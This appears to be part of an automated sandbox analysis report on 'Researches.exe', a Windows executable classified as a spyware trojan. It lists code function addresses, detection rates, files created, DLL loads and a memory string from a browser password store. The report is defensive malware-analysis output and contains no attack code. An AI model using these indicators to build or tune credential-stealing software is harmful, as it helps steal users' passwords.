          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36821D3811_2_36821D38
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36825D4011_2_36825D40
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682E14911_2_3682E149
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682F95011_2_3682F950
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682C15711_2_3682C157
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682E15811_2_3682E158
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682F96011_2_3682F960
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3682C16811_2_3682C168
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684182811_2_36841828
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684AC6011_2_3684AC60
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36840E8711_2_36840E87
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684268011_2_36842680
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36847C8111_2_36847C81
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684D48811_2_3684D488
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36847C9011_2_36847C90
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36840E9811_2_36840E98
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684649811_2_36846498
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368464A811_2_368464A8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684DEA811_2_3684DEA8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36844CB011_2_36844CB0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684A2C611_2_3684A2C6
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36844CC011_2_36844CC0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684A2D011_2_3684A2D0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36841CDF11_2_36841CDF
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368434D811_2_368434D8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36848AD811_2_36848AD8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36848AE811_2_36848AE8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684F2E811_2_3684F2E8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368404F711_2_368404F7
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36841CF011_2_36841CF0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368472F011_2_368472F0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684300011_2_36843000
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684D20011_2_3684D200
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36849E0811_2_36849E08
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684861011_2_36848610
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684301011_2_36843010
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684001311_2_36840013
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684181811_2_36841818
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684862011_2_36848620
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36846E2A11_2_36846E2A
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36846E3811_2_36846E38
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684004011_2_36840040
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684564011_2_36845640
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684C04811_2_3684C048
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36843E5711_2_36843E57
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684565011_2_36845650
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684AC5011_2_3684AC50
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684266F11_2_3684266F
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36843E6811_2_36843E68
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684946811_2_36849468
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684947811_2_36849478
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684518811_2_36845188
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684A78A11_2_3684A78A
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684399111_2_36843991
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684A79811_2_3684A798
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684D99911_2_3684D999
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368439A011_2_368439A0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36848FA011_2_36848FA0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684B3A011_2_3684B3A0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368421A911_2_368421A9
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36848FB011_2_36848FB0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368421B811_2_368421B8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368477B811_2_368477B8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368409C011_2_368409C0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368477C811_2_368477C8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36845FD411_2_36845FD4
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368409D011_2_368409D0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368447E711_2_368447E7
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36845FE011_2_36845FE0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684C7E011_2_3684C7E0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36849DFE11_2_36849DFE
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368447F811_2_368447F8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684730011_2_36847300
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684050811_2_36840508
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36845B0911_2_36845B09
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684D71011_2_3684D710
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36845B1811_2_36845B18
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684B11811_2_3684B118
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684432011_2_36844320
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684433011_2_36844330
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684993011_2_36849930
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684E13011_2_3684E130
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36842B3811_2_36842B38
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684BB3A11_2_3684BB3A
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684814711_2_36848147
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684994011_2_36849940
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36842B4811_2_36842B48
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684135011_2_36841350
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684695F11_2_3684695F
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684815811_2_36848158
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684C55811_2_3684C558
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684136011_2_36841360
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684697011_2_36846970
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684517811_2_36845178
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3684CF7811_2_3684CF78
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368588B811_2_368588B8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36858BD811_2_36858BD8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368511F811_2_368511F8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36853A8711_2_36853A87
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36856C8811_2_36856C88
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36859E8811_2_36859E88
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36853A9811_2_36853A98
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36856C9811_2_36856C98
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36859E9811_2_36859E98
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685D09811_2_3685D098
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368524A711_2_368524A7
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685ECA911_2_3685ECA9
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368556A811_2_368556A8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685BAA811_2_3685BAA8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368588AB11_2_368588AB
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368524B811_2_368524B8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368556B811_2_368556B8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685BAB811_2_3685BAB8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685ECB811_2_3685ECB8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368540C711_2_368540C7
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685A4C711_2_3685A4C7
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368540D811_2_368540D8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368572D811_2_368572D8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685A4D811_2_3685A4D8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685D6D811_2_3685D6D8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36855CE711_2_36855CE7
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36852AE711_2_36852AE7
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685F2E711_2_3685F2E7
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685C0E811_2_3685C0E8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685F2F811_2_3685F2F8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36852AF811_2_36852AF8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36855CF811_2_36855CF8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36858EF811_2_36858EF8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685C0F811_2_3685C0F8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36852E0711_2_36852E07
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685920F11_2_3685920F
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685600911_2_36856009
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685F60811_2_3685F608
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685F61811_2_3685F618
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36852E1811_2_36852E18
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685601811_2_36856018
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685921811_2_36859218
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685C41811_2_3685C418
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685E02711_2_3685E027
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36854A2911_2_36854A29
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685183811_2_36851838
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36854A3811_2_36854A38
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36857C3811_2_36857C38
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685AE3811_2_3685AE38
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685E03811_2_3685E038
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685664711_2_36856647
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685CA4711_2_3685CA47
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685FC4F11_2_3685FC4F
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685344811_2_36853448
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685984B11_2_3685984B
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685FC5811_2_3685FC58
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685345811_2_36853458
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685665811_2_36856658
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685985811_2_36859858
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685CA5811_2_3685CA58
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685B46711_2_3685B467
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36851E6811_2_36851E68
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685506811_2_36855068
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685826811_2_36858268
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36851E7811_2_36851E78
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685507811_2_36855078
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685827811_2_36858278
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685B47811_2_3685B478
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685E67811_2_3685E678
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685538711_2_36855387
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685B78711_2_3685B787
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685858811_2_36858588
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685218811_2_36852188
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685219811_2_36852198
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685539811_2_36855398
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685859811_2_36858598
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685B79811_2_3685B798
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685E99811_2_3685E998
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36853DA711_2_36853DA7
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36856FA811_2_36856FA8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685D3AB11_2_3685D3AB
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36853DB811_2_36853DB8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36856FB811_2_36856FB8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685A1B811_2_3685A1B8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685D3B811_2_3685D3B8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685BDC911_2_3685BDC9
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368527C811_2_368527C8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368559C811_2_368559C8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685EFC811_2_3685EFC8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685EFD811_2_3685EFD8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368527D811_2_368527D8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368559D811_2_368559D8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685BDD811_2_3685BDD8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368575E711_2_368575E7
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368543E811_2_368543E8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685D9E811_2_3685D9E8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368543F811_2_368543F8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368575F811_2_368575F8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685A7F811_2_3685A7F8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685D9F811_2_3685D9F8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685470711_2_36854707
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685790711_2_36857907
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685DD0711_2_3685DD07
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685151811_2_36851518
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685471811_2_36854718
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685791811_2_36857918
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685AB1811_2_3685AB18
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685DD1811_2_3685DD18
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685312811_2_36853128
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685632811_2_36856328
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685C72811_2_3685C728
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685F92811_2_3685F928
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685F93811_2_3685F938
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685313811_2_36853138
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685633811_2_36856338
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685953811_2_36859538
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685C73811_2_3685C738
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685054011_2_36850540
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685E34911_2_3685E349
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36851B4811_2_36851B48
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36854D4811_2_36854D48
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36851B5811_2_36851B58
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36854D5811_2_36854D58
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36857F5811_2_36857F58
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685B15811_2_3685B158
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685E35811_2_3685E358
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685696711_2_36856967
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685CD6D11_2_3685CD6D
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685377811_2_36853778
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685697811_2_36856978
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36859B7811_2_36859B78
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_3685CD7811_2_3685CD78
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368C036011_2_368C0360
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368C81B011_2_368C81B0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368C69B011_2_368C69B0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368C892011_2_368C8920
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368C1AB011_2_368C1AB0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368C391011_2_368C3910
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368C035011_2_368C0350
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368C40A811_2_368C40A8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368C001111_2_368C0011
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368C004011_2_368C0040
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368C81A411_2_368C81A4
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368C2EF011_2_368C2EF0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368C4D5011_2_368C4D50
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368C4AC811_2_368C4AC8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368C484011_2_368C4840
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_368C891011_2_368C8910
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_369A887011_2_369A8870
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_369A479411_2_369A4794
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_369A75D811_2_369A75D8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_369AE0D011_2_369AE0D0
          Source: C:\Users\user\Desktop\Researches.exeCode function: String function: 00402AD0 appears 51 times
          Source: Researches.exeStatic PE information: invalid certificate
          Source: Researches.exe, 0000000B.00000002.3540699141.0000000033407000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Researches.exe
          Source: Researches.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/17@5/5
          Source: C:\Users\user\Desktop\Researches.exeCode function: 0_2_0040458C GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_0040458C
          Source: C:\Users\user\Desktop\Researches.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
          Source: C:\Users\user\Desktop\Researches.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierministerJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeMutant created: NULL
          Source: C:\Users\user\Desktop\Researches.exeFile created: C:\Users\user\AppData\Local\Temp\nsx66FD.tmpJump to behavior
          Source: Researches.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Researches.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Researches.exe, 0000000B.00000002.3541070923.00000000338E2000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3541070923.00000000338AE000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3541070923.00000000338BC000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3541070923.000000003389E000.00000004.00000800.00020000.00000000.sdmp, Researches.exe, 0000000B.00000002.3541070923.00000000338D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: Researches.exeReversingLabs: Detection: 50%
          Source: Researches.exeVirustotal: Detection: 56%
          Source: C:\Users\user\Desktop\Researches.exeFile read: C:\Users\user\Desktop\Researches.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Researches.exe "C:\Users\user\Desktop\Researches.exe"
          Source: C:\Users\user\Desktop\Researches.exeProcess created: C:\Users\user\Desktop\Researches.exe "C:\Users\user\Desktop\Researches.exe"
          Source: C:\Users\user\Desktop\Researches.exeProcess created: C:\Users\user\Desktop\Researches.exe "C:\Users\user\Desktop\Researches.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\Researches.exeSection loaded: secur32.dllJump to behavior
